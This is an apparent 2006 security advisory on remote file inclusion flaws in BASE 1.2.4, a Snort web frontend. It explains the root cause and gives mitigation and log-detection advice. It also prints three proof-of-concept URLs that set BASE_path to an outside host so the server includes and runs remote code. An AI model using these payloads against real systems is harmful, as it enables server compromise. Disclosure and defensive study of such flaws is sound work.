# Title : BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities
# Published : 2006-05-25
# Author : str0ke
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
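# Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
# Root cause: each script below builds its include path from $BASE_path, and the excerpts show no assignment to it before the include. When a script is requested directly, the value can be taken from the request (this presumably depends on register_globals being on), and a URL value is fetched and executed if PHP allows remote includes.
# Mitigation: define BASE_path from trusted configuration before any include, block direct web access to includes/, and keep register_globals and allow_url_include (allow_url_fopen on older PHP) off. For detection, look in web server logs for requests to these scripts carrying a BASE_path parameter.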
##################################
[code (base_qry_common.php)]
// $BASE_path is interpolated straight into the include path; this excerpt shows
// no assignment or validation before use, so a request-supplied value
// (presumably via register_globals -- confirm) decides which file is included.
// Hardening: set the base path from trusted configuration before this line.
include_once("$BASE_path/includes/base_signature.inc.php");
[/code]
http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&
########################################
[code (base_stat_common.php)]
// Same pattern as base_qry_common.php: the include path is prefixed with
// $BASE_path, and nothing in this excerpt sets or checks it first.
// NOTE(review): the script should refuse to run when it is requested directly
// instead of being included by an entry point that has already set the path.
include_once("$BASE_path/includes/base_constants.inc.php");
[/code]
http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&
###############################################
[code (includes/base_include.inc.php)]
// Every include in this file takes its prefix from $BASE_path, so one
// unvalidated value controls all of them. This file sits under includes/ and
// is meant to be included by other scripts; the URL below shows it being
// requested directly, which web-server access rules on includes/ would prevent.
include_once("$BASE_path/includes/base_db.inc.php");
include_once("$BASE_path/includes/base_output_html.inc.php");
include_once("$BASE_path/includes/base_state_common.inc.php");
...
[/code]
http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&
#######################################################